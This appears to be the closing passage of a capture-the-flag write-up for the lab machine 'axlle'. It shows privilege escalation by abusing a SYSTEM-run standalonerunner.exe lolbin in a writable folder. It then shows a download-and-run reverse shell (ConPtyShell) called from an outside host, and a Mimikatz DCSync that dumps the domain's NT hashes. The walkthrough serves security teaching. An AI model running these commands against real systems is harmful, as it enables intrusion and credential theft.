- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE

## Bugs
There are probably several.
```

The most important part is:

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

It is periodically running as SYSTEM after a fixed interval.

```console
[localhost]: PS C:\> Get-Acl '.\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\' | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\
Owner  : BUILTIN\Administrators
Group  : NT AUTHORITY\SYSTEM
Access : AXLLE\App Devs Allow  Write, ReadAndExecute, Synchronize
         Everyone Allow  Read, Synchronize
         AXLLE\Administrator Allow  FullControl
         BUILTIN\Users Allow  Read, Synchronize
         AXLLE\App Devs Allow  ReadAndExecute, Synchronize
         NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -1610612736
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  -1610612736
Audit  :
Sddl   : O:BAG:SYD:AI(A;OICI;0x1201bf;;;S-1-5-21-1005535646-190407494-3473065389-1108)(A;OICIID;FR;;;WD)(A;OICIID;FA;;;LA)(A;OICIID;FR;;;BU)(A;OICIID;0x1200a9;;;S-1-5-21- 
         1005535646-190407494-3473065389-1108)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-18310 
         38044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)(A; 
         ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
```

`App Devs` have the `Write` permission.

```console
[localhost]: PS C:\> ls '.\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\'

    Directory: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/30/2023   3:08 AM          33392 standalonerunner.exe
-a----         9/30/2023   3:08 AM          43632 standalonexml.dll
```

I tried copying my reverse shell DLL and replacing `standalonexml.dll`, but it failed:

```console
[localhost]: PS C:\> cp C:\Windows\Tasks\ 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonexml.dll'   
cp : Container cannot be copied onto existing leaf item.
```

Googling around, I learnt that `standalonerunner.exe` is a known lolbin: <https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md>  
I followed the tutorial pretty much:

```console
[localhost]: PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> Add-Content -Path ".\reboot.rsf" -Value "Opcode"
[localhost]: PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> Add-Content -Path ".\reboot.rsf" -Value "True"
[localhost]: PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> mkdir Opcode\working
[localhost]: PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> New-Item Opcode\working\rsf.rsf
[localhost]: PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> Add-Content -Path ".\command.txt" -Value "C:\Windows\Tasks\revshell.exe"
```

And obtained a shell as `Administrator`:

```console
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\Opcode\working>whoami
axlle\administrator
```

Let's switch to ConPtyShell:

```console
C:\> powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001
```

Mimikatz can be used to dump NThashes:

```console
PS C:\> IEX(IWR http://10.10.14.185:8000/vividogz/Invoke-Mimikatz.ps1 -UseBasicParsing)
PS C:\> Invoke-Mimikatz -Command '"lsadump::dcsync /all /csv"'
Hostname: MAINFRAME.axlle.htb / S-1-5-21-1005535646-190407494-3473065389                                                                                                                                                                                                                                                                              .#####.   mimikatz 2.2.0 (x64) #19041 Jan 29 2023 07:49:10                                                                                                               .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                                                                               
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::dcsync /all /csv
[DC] 'axlle.htb' will be the domain
[DC] 'MAINFRAME.axlle.htb' will be the DC server
[DC] Exporting domain 'axlle.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  6d92f4784b46504cf3bedbc702ac03fe        514
1111    brad.shaw       9cefad58a9a2188687922a6cc10485a3        66048
1116    brooke.graham   bcd1044566a9fb7fe130bdd5bcce7db1        66048
1124    calum.scott     35a376bb58095b4a559fbceccdb01364        66048
1122    dan.kendo       3fa7f786ca68123db7fdef522cb93a22        66048
1109    david.brice     0279f2a1f290ff139458088afb45fa3f        66048
1115    emily.cook      b35775e6e9d3af6c0dcf33cef162986d        66048
1110    frankie.rose    80c10c678c9b31e2091065c90519e529        66048
1119    jess.adams      933d10a14def0ed5ffbd708092d92e4d        66048
1123    lindsay.richards        71d62e4384f2e9b92169a10a29539b2d        66048
1118    matt.drew       eb116285721b66b71d98803716b94616        66048
1112    samantha.jade   8047ec8cda0666f4e1c1be0ddc2d0378        66048
1121    simon.smalls    d14ddd0880870e9d7fcb442653b6183e        66048
1117    trent.langdon   a4bbfacd030508d12f3a203bbab8b1f8        66048
1114    xavier.edmund   9ecaa82cc22e0e1534493a03276dc02b        66048
1000    MAINFRAME$      011a082f7649082b7fe7521c2ae2bb2a        532480
500     Administrator   6322b5b9f9daecb0fefd594fa6fafb6a        66048
1113    gideon.hamill   aa753e07e1fd47a45e0ecb3a0cc70dab        66048
1125    dallon.matrix   124a4a99bf67ca4b04e2266f967daa64        66048
1120    jacob.greeny    d2e91c1cd5703bbf1c351e724257d498        66048
1126    baz.humphries   d2e91c1cd5703bbf1c351e724257d498        66048
```
